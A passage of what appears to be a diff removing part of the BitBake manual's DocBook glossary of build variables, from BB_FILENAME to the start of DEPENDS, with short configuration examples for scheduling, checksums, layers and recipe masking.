- <link linkend='var-bb-MIRRORS'><filename>MIRRORS</filename></link>.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-BB_FILENAME'><glossterm>BB_FILENAME</glossterm>
- <glossdef>
- <para>
- Contains the filename of the recipe that owns the currently
- running task.
- For example, if the <filename>do_fetch</filename> task that
- resides in the <filename>my-recipe.bb</filename> is
- executing, the <filename>BB_FILENAME</filename> variable
- contains "/foo/path/my-recipe.bb".
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-BB_GENERATE_MIRROR_TARBALLS'><glossterm>BB_GENERATE_MIRROR_TARBALLS</glossterm>
- <glossdef>
- <para>
- Causes tarballs of the Git repositories, including the
- Git metadata, to be placed in the
- <link linkend='var-bb-DL_DIR'><filename>DL_DIR</filename></link>
- directory.
- Anyone wishing to create a source mirror would want to
- enable this variable.
- </para>
-
- <para>
- For performance reasons, creating and placing tarballs of
- the Git repositories is not the default action by BitBake.
- <literallayout class='monospaced'>
- BB_GENERATE_MIRROR_TARBALLS = "1"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-BB_HASHCONFIG_WHITELIST'><glossterm>BB_HASHCONFIG_WHITELIST</glossterm>
- <glossdef>
- <para>
- Lists variables that are excluded from base configuration
- checksum, which is used to determine if the cache can
- be reused.
- </para>
-
- <para>
- One of the ways BitBake determines whether to re-parse the
- main metadata is through checksums of the variables in the
- datastore of the base configuration data.
- There are variables that you typically want to exclude when
- checking whether or not to re-parse and thus rebuild the
- cache.
- As an example, you would usually exclude
- <filename>TIME</filename> and <filename>DATE</filename>
- because these variables are always changing.
- If you did not exclude them, BitBake would never reuse the
- cache.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-BB_HASHBASE_WHITELIST'><glossterm>BB_HASHBASE_WHITELIST</glossterm>
- <glossdef>
- <para>
- Lists variables that are excluded from checksum and
- dependency data.
- Variables that are excluded can therefore change without
- affecting the checksum mechanism.
- A common example would be the variable for the path of
- the build.
- BitBake's output should not (and usually does not) depend
- on the directory in which it was built.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-BB_HASHCHECK_FUNCTION'><glossterm>BB_HASHCHECK_FUNCTION</glossterm>
- <glossdef>
- <para>
- Specifies the name of the function to call during the
- "setscene" part of the task's execution in order to
- validate the list of task hashes.
- The function returns the list of setscene tasks that should
- be executed.
- </para>
-
- <para>
- At this point in the execution of the code, the objective
- is to quickly verify if a given setscene function is likely
- to work or not.
- It's easier to check the list of setscene functions in
- one pass than to call many individual tasks.
- The returned list need not be completely accurate.
- A given setscene task can still later fail.
- However, the more accurate the data returned, the more
- efficient the build will be.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-BB_INVALIDCONF'><glossterm>BB_INVALIDCONF</glossterm>
- <glossdef>
- <para>
- Used in combination with the
- <filename>ConfigParsed</filename> event to trigger
- re-parsing the base metadata (i.e. all the
- recipes).
- The <filename>ConfigParsed</filename> event can set the
- variable to trigger the re-parse.
- You must be careful to avoid recursive loops with this
- functionality.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-BB_LOGCONFIG'><glossterm>BB_LOGCONFIG</glossterm>
- <glossdef>
- <para>
- Specifies the name of a config file that contains the user
- logging configuration. See
- <link linkend="logging">Logging</link> for additional
- information
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-BB_LOGFMT'><glossterm>BB_LOGFMT</glossterm>
- <glossdef>
- <para>
- Specifies the name of the log files saved into
- <filename>${</filename><link linkend='var-bb-T'><filename>T</filename></link><filename>}</filename>.
- By default, the <filename>BB_LOGFMT</filename> variable
- is undefined and the log file names get created using the
- following form:
- <literallayout class='monospaced'>
- log.{task}.{pid}
- </literallayout>
- If you want to force log files to take a specific name,
- you can set this variable in a configuration file.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-BB_NICE_LEVEL'><glossterm>BB_NICE_LEVEL</glossterm>
- <glossdef>
- <para>
- Allows BitBake to run at a specific priority
- (i.e. nice level).
- System permissions usually mean that BitBake can reduce its
- priority but not raise it again.
- See
- <link linkend='var-bb-BB_TASK_NICE_LEVEL'><filename>BB_TASK_NICE_LEVEL</filename></link>
- for additional information.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-BB_NO_NETWORK'><glossterm>BB_NO_NETWORK</glossterm>
- <glossdef>
- <para>
- Disables network access in the BitBake fetcher modules.
- With this access disabled, any command that attempts to
- access the network becomes an error.
- </para>
-
- <para>
- Disabling network access is useful for testing source
- mirrors, running builds when not connected to the Internet,
- and when operating in certain kinds of firewall
- environments.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-BB_NUMBER_THREADS'><glossterm>BB_NUMBER_THREADS</glossterm>
- <glossdef>
- <para>
- The maximum number of tasks BitBake should run in parallel
- at any one time.
- If your host development system supports multiple cores,
- a good rule of thumb is to set this variable to twice the
- number of cores.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-BB_NUMBER_PARSE_THREADS'><glossterm>BB_NUMBER_PARSE_THREADS</glossterm>
- <glossdef>
- <para>
- Sets the number of threads BitBake uses when parsing.
- By default, the number of threads is equal to the number
- of cores on the system.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-BB_ORIGENV'><glossterm>BB_ORIGENV</glossterm>
- <glossdef>
- <para>
- Contains a copy of the original external environment in
- which BitBake was run.
- The copy is taken before any whitelisted variable values
- are filtered into BitBake's datastore.
- <note>
- The contents of this variable is a datastore object
- that can be queried using the normal datastore
- operations.
- </note>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-BB_PRESERVE_ENV'><glossterm>BB_PRESERVE_ENV</glossterm>
- <glossdef>
- <para>
- Disables whitelisting and instead allows all variables
- through from the external environment into BitBake's
- datastore.
- <note>
- You must set this variable in the external
- environment in order for it to work.
- </note>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-BB_RUNFMT'><glossterm>BB_RUNFMT</glossterm>
- <glossdef>
- <para>
- Specifies the name of the executable script files
- (i.e. run files) saved into
- <filename>${</filename><link linkend='var-bb-T'><filename>T</filename></link><filename>}</filename>.
- By default, the <filename>BB_RUNFMT</filename> variable
- is undefined and the run file names get created using the
- following form:
- <literallayout class='monospaced'>
- run.{task}.{pid}
- </literallayout>
- If you want to force run files to take a specific name,
- you can set this variable in a configuration file.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-BB_RUNTASK'><glossterm>BB_RUNTASK</glossterm>
- <glossdef>
- <para>
- Contains the name of the currently executing task.
- The value includes the "do_" prefix.
- For example, if the currently executing task is
- <filename>do_config</filename>, the value is
- "do_config".
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-BB_SCHEDULER'><glossterm>BB_SCHEDULER</glossterm>
- <glossdef>
- <para>
- Selects the name of the scheduler to use for the
- scheduling of BitBake tasks.
- Three options exist:
- <itemizedlist>
- <listitem><para><emphasis>basic</emphasis> -
- The basic framework from which everything derives.
- Using this option causes tasks to be ordered
- numerically as they are parsed.
- </para></listitem>
- <listitem><para><emphasis>speed</emphasis> -
- Executes tasks first that have more tasks
- depending on them.
- The "speed" option is the default.
- </para></listitem>
- <listitem><para><emphasis>completion</emphasis> -
- Causes the scheduler to try to complete a given
- recipe once its build has started.
- </para></listitem>
- </itemizedlist>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-BB_SCHEDULERS'><glossterm>BB_SCHEDULERS</glossterm>
- <glossdef>
- <para>
- Defines custom schedulers to import.
- Custom schedulers need to be derived from the
- <filename>RunQueueScheduler</filename> class.
- </para>
-
- <para>
- For information how to select a scheduler, see the
- <link linkend='var-bb-BB_SCHEDULER'><filename>BB_SCHEDULER</filename></link>
- variable.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-BB_SETSCENE_DEPVALID'><glossterm>BB_SETSCENE_DEPVALID</glossterm>
- <glossdef>
- <para>
- Specifies a function BitBake calls that determines
- whether BitBake requires a setscene dependency to be met.
- </para>
-
- <para>
- When running a setscene task, BitBake needs to
- know which dependencies of that setscene task also need
- to be run.
- Whether dependencies also need to be run is highly
- dependent on the metadata.
- The function specified by this variable returns a
- "True" or "False" depending on whether the dependency needs
- to be met.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-BB_SETSCENE_VERIFY_FUNCTION2'><glossterm>BB_SETSCENE_VERIFY_FUNCTION2</glossterm>
- <glossdef>
- <para>
- Specifies a function to call that verifies the list of
- planned task execution before the main task execution
- happens.
- The function is called once BitBake has a list of setscene
- tasks that have run and either succeeded or failed.
- </para>
-
- <para>
- The function allows for a task list check to see if they
- make sense.
- Even if BitBake was planning to skip a task, the
- returned value of the function can force BitBake to run
- the task, which is necessary under certain metadata
- defined circumstances.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-BB_SIGNATURE_EXCLUDE_FLAGS'><glossterm>BB_SIGNATURE_EXCLUDE_FLAGS</glossterm>
- <glossdef>
- <para>
- Lists variable flags (varflags)
- that can be safely excluded from checksum
- and dependency data for keys in the datastore.
- When generating checksum or dependency data for keys in the
- datastore, the flags set against that key are normally
- included in the checksum.
- </para>
-
- <para>
- For more information on varflags, see the
- "<link linkend='variable-flags'>Variable Flags</link>"
- section.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-BB_SIGNATURE_HANDLER'><glossterm>BB_SIGNATURE_HANDLER</glossterm>
- <glossdef>
- <para>
- Defines the name of the signature handler BitBake uses.
- The signature handler defines the way stamp files are
- created and handled, if and how the signature is
- incorporated into the stamps, and how the signature
- itself is generated.
- </para>
-
- <para>
- A new signature handler can be added by injecting a class
- derived from the
- <filename>SignatureGenerator</filename> class into the
- global namespace.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-BB_SRCREV_POLICY'><glossterm>BB_SRCREV_POLICY</glossterm>
- <glossdef>
- <para>
- Defines the behavior of the fetcher when it interacts with
- source control systems and dynamic source revisions.
- The <filename>BB_SRCREV_POLICY</filename> variable is
- useful when working without a network.
- </para>
-
- <para>
- The variable can be set using one of two policies:
- <itemizedlist>
- <listitem><para><emphasis>cache</emphasis> -
- Retains the value the system obtained previously
- rather than querying the source control system
- each time.
- </para></listitem>
- <listitem><para><emphasis>clear</emphasis> -
- Queries the source controls system every time.
- With this policy, there is no cache.
- The "clear" policy is the default.
- </para></listitem>
- </itemizedlist>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-BB_STAMP_POLICY'><glossterm>BB_STAMP_POLICY</glossterm>
- <glossdef>
- <para>
- Defines the mode used for how timestamps of stamp files
- are compared.
- You can set the variable to one of the following modes:
- <itemizedlist>
- <listitem><para><emphasis>perfile</emphasis> -
- Timestamp comparisons are only made
- between timestamps of a specific recipe.
- This is the default mode.
- </para></listitem>
- <listitem><para><emphasis>full</emphasis> -
- Timestamp comparisons are made for all
- dependencies.
- </para></listitem>
- <listitem><para><emphasis>whitelist</emphasis> -
- Identical to "full" mode except timestamp
- comparisons are made for recipes listed in the
- <link linkend='var-bb-BB_STAMP_WHITELIST'><filename>BB_STAMP_WHITELIST</filename></link>
- variable.
- </para></listitem>
- </itemizedlist>
- <note>
- Stamp policies are largely obsolete with the
- introduction of setscene tasks.
- </note>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-BB_STAMP_WHITELIST'><glossterm>BB_STAMP_WHITELIST</glossterm>
- <glossdef>
- <para>
- Lists files whose stamp file timestamps are compared when
- the stamp policy mode is set to "whitelist".
- For information on stamp policies, see the
- <link linkend='var-bb-BB_STAMP_POLICY'><filename>BB_STAMP_POLICY</filename></link>
- variable.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-BB_STRICT_CHECKSUM'><glossterm>BB_STRICT_CHECKSUM</glossterm>
- <glossdef>
- <para>
- Sets a more strict checksum mechanism for non-local URLs.
- Setting this variable to a value causes BitBake
- to report an error if it encounters a non-local URL
- that does not have at least one checksum specified.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-BB_TASK_IONICE_LEVEL'><glossterm>BB_TASK_IONICE_LEVEL</glossterm>
- <glossdef>
- <para>
- Allows adjustment of a task's Input/Output priority.
- During Autobuilder testing, random failures can occur
- for tasks due to I/O starvation.
- These failures occur during various QEMU runtime timeouts.
- You can use the <filename>BB_TASK_IONICE_LEVEL</filename>
- variable to adjust the I/O priority of these tasks.
- <note>
- This variable works similarly to the
- <link linkend='var-bb-BB_TASK_NICE_LEVEL'><filename>BB_TASK_NICE_LEVEL</filename></link>
- variable except with a task's I/O priorities.
- </note>
- </para>
-
- <para>
- Set the variable as follows:
- <literallayout class='monospaced'>
- BB_TASK_IONICE_LEVEL = "<replaceable>class</replaceable>.<replaceable>prio</replaceable>"
- </literallayout>
- For <replaceable>class</replaceable>, the default value is
- "2", which is a best effort.
- You can use "1" for realtime and "3" for idle.
- If you want to use realtime, you must have superuser
- privileges.
- </para>
-
- <para>
- For <replaceable>prio</replaceable>, you can use any
- value from "0", which is the highest priority, to "7",
- which is the lowest.
- The default value is "4".
- You do not need any special privileges to use this range
- of priority values.
- <note>
- In order for your I/O priority settings to take effect,
- you need the Completely Fair Queuing (CFQ) Scheduler
- selected for the backing block device.
- To select the scheduler, use the following command form
- where <replaceable>device</replaceable> is the device
- (e.g. sda, sdb, and so forth):
- <literallayout class='monospaced'>
- $ sudo sh -c “echo cfq > /sys/block/<replaceable>device</replaceable>/queu/scheduler
- </literallayout>
- </note>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-BB_TASK_NICE_LEVEL'><glossterm>BB_TASK_NICE_LEVEL</glossterm>
- <glossdef>
- <para>
- Allows specific tasks to change their priority
- (i.e. nice level).
- </para>
-
- <para>
- You can use this variable in combination with task
- overrides to raise or lower priorities of specific tasks.
- For example, on the
- <ulink url='http://www.yoctoproject.org'>Yocto Project</ulink>
- autobuilder, QEMU emulation in images is given a higher
- priority as compared to build tasks to ensure that images
- do not suffer timeouts on loaded systems.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-BB_TASKHASH'><glossterm>BB_TASKHASH</glossterm>
- <glossdef>
- <para>
- Within an executing task, this variable holds the hash
- of the task as returned by the currently enabled
- signature generator.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-BB_VERBOSE_LOGS'><glossterm>BB_VERBOSE_LOGS</glossterm>
- <glossdef>
- <para>
- Controls how verbose BitBake is during builds.
- If set, shell scripts echo commands and shell script output
- appears on standard out (stdout).
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-BB_WORKERCONTEXT'><glossterm>BB_WORKERCONTEXT</glossterm>
- <glossdef>
- <para>
- Specifies if the current context is executing a task.
- BitBake sets this variable to "1" when a task is
- being executed.
- The value is not set when the task is in server context
- during parsing or event handling.
- </para>
- </glossdef>
- </glossentry>
-
-
- <glossentry id='var-bb-BBCLASSEXTEND'><glossterm>BBCLASSEXTEND</glossterm>
- <glossdef>
- <para>
- Allows you to extend a recipe so that it builds variants
- of the software.
- Some examples of these variants for recipes from the
- OpenEmbedded-Core metadata are "natives" such as
- <filename>quilt-native</filename>, which is a copy of
- Quilt built to run on the build system; "crosses" such
- as <filename>gcc-cross</filename>, which is a compiler
- built to run on the build machine but produces binaries
- that run on the target <filename>MACHINE</filename>;
- "nativesdk", which targets the SDK machine instead of
- <filename>MACHINE</filename>; and "mulitlibs" in the form
- "<filename>multilib:</filename><replaceable>multilib_name</replaceable>".
- </para>
-
- <para>
- To build a different variant of the recipe with a minimal
- amount of code, it usually is as simple as adding the
- variable to your recipe.
- Here are two examples.
- The "native" variants are from the OpenEmbedded-Core
- metadata:
- <literallayout class='monospaced'>
- BBCLASSEXTEND =+ "native nativesdk"
- BBCLASSEXTEND =+ "multilib:<replaceable>multilib_name</replaceable>"
- </literallayout>
- <note>
- <para>
- Internally, the <filename>BBCLASSEXTEND</filename>
- mechanism generates recipe variants by rewriting
- variable values and applying overrides such as
- <filename>_class-native</filename>.
- For example, to generate a native version of a recipe,
- a
- <link linkend='var-bb-DEPENDS'><filename>DEPENDS</filename></link>
- on "foo" is rewritten to a <filename>DEPENDS</filename>
- on "foo-native".
- </para>
-
- <para>
- Even when using <filename>BBCLASSEXTEND</filename>, the
- recipe is only parsed once.
- Parsing once adds some limitations.
- For example, it is not possible to
- include a different file depending on the variant,
- since <filename>include</filename> statements are
- processed when the recipe is parsed.
- </para>
- </note>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-BBDEBUG'><glossterm>BBDEBUG</glossterm>
- <glossdef>
- <para>
- Sets the BitBake debug output level to a specific value
- as incremented by the <filename>-D</filename> command line
- option.
- <note>
- You must set this variable in the external environment
- in order for it to work.
- </note>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-BBFILE_COLLECTIONS'><glossterm>BBFILE_COLLECTIONS</glossterm>
- <glossdef>
- <para>Lists the names of configured layers.
- These names are used to find the other <filename>BBFILE_*</filename>
- variables.
- Typically, each layer appends its name to this variable in its
- <filename>conf/layer.conf</filename> file.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-BBFILE_PATTERN'><glossterm>BBFILE_PATTERN</glossterm>
- <glossdef>
- <para>Variable that expands to match files from
- <link linkend='var-bb-BBFILES'><filename>BBFILES</filename></link>
- in a particular layer.
- This variable is used in the <filename>conf/layer.conf</filename> file and must
- be suffixed with the name of the specific layer (e.g.
- <filename>BBFILE_PATTERN_emenlow</filename>).</para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-BBFILE_PRIORITY'><glossterm>BBFILE_PRIORITY</glossterm>
- <glossdef>
- <para>Assigns the priority for recipe files in each layer.</para>
- <para>This variable is useful in situations where the same recipe appears in
- more than one layer.
- Setting this variable allows you to prioritize a
- layer against other layers that contain the same recipe - effectively
- letting you control the precedence for the multiple layers.
- The precedence established through this variable stands regardless of a
- recipe's version
- (<link linkend='var-bb-PV'><filename>PV</filename></link> variable).
- For example, a layer that has a recipe with a higher <filename>PV</filename> value but for
- which the <filename>BBFILE_PRIORITY</filename> is set to have a lower precedence still has a
- lower precedence.</para>
- <para>A larger value for the <filename>BBFILE_PRIORITY</filename> variable results in a higher
- precedence.
- For example, the value 6 has a higher precedence than the value 5.
- If not specified, the <filename>BBFILE_PRIORITY</filename> variable is set based on layer
- dependencies (see the
- <filename><link linkend='var-bb-LAYERDEPENDS'>LAYERDEPENDS</link></filename> variable for
- more information.
- The default priority, if unspecified
- for a layer with no dependencies, is the lowest defined priority + 1
- (or 1 if no priorities are defined).</para>
- <tip>
- You can use the command <filename>bitbake-layers show-layers</filename> to list
- all configured layers along with their priorities.
- </tip>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-BBFILES'><glossterm>BBFILES</glossterm>
- <glossdef>
- <para>
- A space-separated list of recipe files BitBake uses to
- build software.
- </para>
-
- <para>
- When specifying recipe files, you can pattern match using
- Python's
- <ulink url='https://docs.python.org/3/library/glob.html'><filename>glob</filename></ulink>
- syntax.
- For details on the syntax, see the documentation by
- following the previous link.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-BBFILES_DYNAMIC'><glossterm>BBFILES_DYNAMIC</glossterm>
- <info>
- BBFILES_DYNAMIC[doc] = "Activates content depending on presence of identified layers."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Activates content depending on presence of identified layers.
- You identify the layers by the collections that the layers
- define.
- </para>
-
- <para>
- Use the <filename>BBFILES_DYNAMIC</filename> variable to
- avoid <filename>.bbappend</filename> files whose
- corresponding <filename>.bb</filename> file is in a layer
- that attempts to modify other layers through
- <filename>.bbappend</filename> but does not want to
- introduce a hard dependency on those other layers.
- </para>
-
- <para>
- Additionally you can prefix the rule with "!" to add
- <filename>.bbappend</filename> and <filename>.bb</filename> files
- in case a layer is not present.
- Use this avoid hard dependency on those other layers.
- </para>
-
- <para>
- Use the following form for
- <filename>BBFILES_DYNAMIC</filename>:
- <literallayout class='monospaced'>
- <replaceable>collection_name</replaceable>:<replaceable>filename_pattern</replaceable>
- </literallayout>
- The following example identifies two collection names and
- two filename patterns:
- <literallayout class='monospaced'>
- BBFILES_DYNAMIC += "\
- clang-layer:${LAYERDIR}/bbappends/meta-clang/*/*/*.bbappend \
- core:${LAYERDIR}/bbappends/openembedded-core/meta/*/*/*.bbappend \
- "
- </literallayout>
- When the collection name is prefixed with "!" it will add the file pattern in case
- the layer is absent:
- <literallayout class='monospaced'>
- BBFILES_DYNAMIC += "\
- !clang-layer:${LAYERDIR}/backfill/meta-clang/*/*/*.bb \
- "
- </literallayout>
-
- This next example shows an error message that occurs
- because invalid entries are found, which cause parsing to
- abort:
- <literallayout class='monospaced'>
- ERROR: BBFILES_DYNAMIC entries must be of the form {!}&lt;collection name&gt;:&lt;filename pattern&gt;, not:
- /work/my-layer/bbappends/meta-security-isafw/*/*/*.bbappend
- /work/my-layer/bbappends/openembedded-core/meta/*/*/*.bbappend
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-BBINCLUDED'><glossterm>BBINCLUDED</glossterm>
- <glossdef>
- <para>
- Contains a space-separated list of all of all files that
- BitBake's parser included during parsing of the current
- file.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-BBINCLUDELOGS'><glossterm>BBINCLUDELOGS</glossterm>
- <glossdef>
- <para>
- If set to a value, enables printing the task log when
- reporting a failed task.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-BBINCLUDELOGS_LINES'><glossterm>BBINCLUDELOGS_LINES</glossterm>
- <glossdef>
- <para>
- If
- <link linkend='var-bb-BBINCLUDELOGS'><filename>BBINCLUDELOGS</filename></link>
- is set, specifies the maximum number of lines from the
- task log file to print when reporting a failed task.
- If you do not set <filename>BBINCLUDELOGS_LINES</filename>,
- the entire log is printed.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-BBLAYERS'><glossterm>BBLAYERS</glossterm>
- <glossdef>
- <para>Lists the layers to enable during the build.
- This variable is defined in the <filename>bblayers.conf</filename> configuration
- file in the build directory.
- Here is an example:
- <literallayout class='monospaced'>
- BBLAYERS = " \
- /home/scottrif/poky/meta \
- /home/scottrif/poky/meta-yocto \
- /home/scottrif/poky/meta-yocto-bsp \
- /home/scottrif/poky/meta-mykernel \
- "
-
- </literallayout>
- This example enables four layers, one of which is a custom, user-defined layer
- named <filename>meta-mykernel</filename>.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-BBLAYERS_FETCH_DIR'><glossterm>BBLAYERS_FETCH_DIR</glossterm>
- <glossdef>
- <para>
- Sets the base location where layers are stored.
- This setting is used in conjunction with
- <filename>bitbake-layers layerindex-fetch</filename> and
- tells <filename>bitbake-layers</filename> where to place
- the fetched layers.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-BBMASK'><glossterm>BBMASK</glossterm>
- <glossdef>
- <para>
- Prevents BitBake from processing recipes and recipe
- append files.
- </para>
-
- <para>
- You can use the <filename>BBMASK</filename> variable
- to "hide" these <filename>.bb</filename> and
- <filename>.bbappend</filename> files.
- BitBake ignores any recipe or recipe append files that
- match any of the expressions.
- It is as if BitBake does not see them at all.
- Consequently, matching files are not parsed or otherwise
- used by BitBake.
- </para>
-
- <para>
- The values you provide are passed to Python's regular
- expression compiler.
- Consequently, the syntax follows Python's Regular
- Expression (re) syntax.
- The expressions are compared against the full paths to
- the files.
- For complete syntax information, see Python's
- documentation at
- <ulink url='http://docs.python.org/3/library/re.html#re'></ulink>.
- </para>
-
- <para>
- The following example uses a complete regular expression
- to tell BitBake to ignore all recipe and recipe append
- files in the <filename>meta-ti/recipes-misc/</filename>
- directory:
- <literallayout class='monospaced'>
- BBMASK = "meta-ti/recipes-misc/"
- </literallayout>
- If you want to mask out multiple directories or recipes,
- you can specify multiple regular expression fragments.
- This next example masks out multiple directories and
- individual recipes:
- <literallayout class='monospaced'>
- BBMASK += "/meta-ti/recipes-misc/ meta-ti/recipes-ti/packagegroup/"
- BBMASK += "/meta-oe/recipes-support/"
- BBMASK += "/meta-foo/.*/openldap"
- BBMASK += "opencv.*\.bbappend"
- BBMASK += "lzma"
- </literallayout>
- <note>
- When specifying a directory name, use the trailing
- slash character to ensure you match just that directory
- name.
- </note>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-BBMULTICONFIG'><glossterm>BBMULTICONFIG</glossterm>
- <info>
- BBMULTICONFIG[doc] = "Enables BitBake to perform multiple configuration builds and lists each separate configuration (multiconfig)."
- </info>
- <glossdef>
- <para role="glossdeffirst">
-<!-- <para role="glossdeffirst"><imagedata fileref="figures/define-generic.png" /> -->
- Enables BitBake to perform multiple configuration builds
- and lists each separate configuration (multiconfig).
- You can use this variable to cause BitBake to build
- multiple targets where each target has a separate
- configuration.
- Define <filename>BBMULTICONFIG</filename> in your
- <filename>conf/local.conf</filename> configuration file.
- </para>
-
- <para>
- As an example, the following line specifies three
- multiconfigs, each having a separate configuration file:
- <literallayout class='monospaced'>
- BBMULTIFONFIG = "configA configB configC"
- </literallayout>
- Each configuration file you use must reside in the
- build directory within a directory named
- <filename>conf/multiconfig</filename> (e.g.
- <replaceable>build_directory</replaceable><filename>/conf/multiconfig/configA.conf</filename>).
- </para>
-
- <para>
- For information on how to use
- <filename>BBMULTICONFIG</filename> in an environment that
- supports building targets with multiple configurations,
- see the
- "<link linkend='executing-a-multiple-configuration-build'>Executing a Multiple Configuration Build</link>"
- section.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-BBPATH'><glossterm>BBPATH</glossterm>
- <glossdef>
- <para>
- Used by BitBake to locate class
- (<filename>.bbclass</filename>) and configuration
- (<filename>.conf</filename>) files.
- This variable is analogous to the
- <filename>PATH</filename> variable.
- </para>
-
- <para>
- If you run BitBake from a directory outside of the
- build directory,
- you must be sure to set
- <filename>BBPATH</filename> to point to the
- build directory.
- Set the variable as you would any environment variable
- and then run BitBake:
- <literallayout class='monospaced'>
- $ BBPATH="<replaceable>build_directory</replaceable>"
- $ export BBPATH
- $ bitbake <replaceable>target</replaceable>
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-BBSERVER'><glossterm>BBSERVER</glossterm>
- <glossdef>
- <para>
- Points to the server that runs memory-resident BitBake.
- The variable is only used when you employ memory-resident
- BitBake.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-BBTARGETS'><glossterm>BBTARGETS</glossterm>
- <glossdef>
- <para>
- Allows you to use a configuration file to add to the list
- of command-line target recipes you want to build.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-BBVERSIONS'><glossterm>BBVERSIONS</glossterm>
- <glossdef>
- <para>
- Allows a single recipe to build multiple versions of a
- project from a single recipe file.
- You also able to specify conditional metadata
- using the
- <link linkend='var-bb-OVERRIDES'><filename>OVERRIDES</filename></link>
- mechanism for a single version or for an optionally named
- range of versions.
- </para>
-
- <para>
- For more information on <filename>BBVERSIONS</filename>,
- see the
- "<link linkend='variants-class-extension-mechanism'>Variants - Class Extension Mechanism</link>"
- section.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-BITBAKE_UI'><glossterm>BITBAKE_UI</glossterm>
- <glossdef>
- <para>
- Used to specify the UI module to use when running BitBake.
- Using this variable is equivalent to using the
- <filename>-u</filename> command-line option.
- <note>
- You must set this variable in the external environment
- in order for it to work.
- </note>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-BUILDNAME'><glossterm>BUILDNAME</glossterm>
- <glossdef>
- <para>
- A name assigned to the build.
- The name defaults to a datetime stamp of when the build was
- started but can be defined by the metadata.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-BZRDIR'><glossterm>BZRDIR</glossterm>
- <glossdef>
- <para>
- The directory in which files checked out of a Bazaar
- system are stored.
- </para>
- </glossdef>
- </glossentry>
-
- </glossdiv>
-
- <glossdiv id='var-bb-glossary-c'><title>C</title>
-
- <glossentry id='var-bb-CACHE'><glossterm>CACHE</glossterm>
- <glossdef>
- <para>
- Specifies the directory BitBake uses to store a cache
- of the metadata so it does not need to be parsed every
- time BitBake is started.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-CVSDIR'><glossterm>CVSDIR</glossterm>
- <glossdef>
- <para>
- The directory in which files checked out under the
- CVS system are stored.
- </para>
- </glossdef>
- </glossentry>
-
- </glossdiv>
-
- <glossdiv id='var-bb-glossary-d'><title>D</title>
-
- <glossentry id='var-bb-DEFAULT_PREFERENCE'><glossterm>DEFAULT_PREFERENCE</glossterm>
- <glossdef>
- <para>
- Specifies a weak bias for recipe selection priority.
- </para>
- <para>
- The most common usage of this is variable is to set
- it to "-1" within a recipe for a development version of a
- piece of software.
- Using the variable in this way causes the stable version
- of the recipe to build by default in the absence of
- <filename><link linkend='var-bb-PREFERRED_VERSION'>PREFERRED_VERSION</link></filename>
- being used to build the development version.
- </para>
- <note>
- The bias provided by <filename>DEFAULT_PREFERENCE</filename>
- is weak and is overridden by
- <filename><link linkend='var-bb-BBFILE_PRIORITY'>BBFILE_PRIORITY</link></filename>
- if that variable is different between two layers
- that contain different versions of the same recipe.
- </note>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-DEPENDS'><glossterm>DEPENDS</glossterm>
- <glossdef>
- <para>
- Lists a recipe's build-time dependencies
- (i.e. other recipe files).
- </para>
-
- <para>
- Consider this simple example for two recipes named "a" and
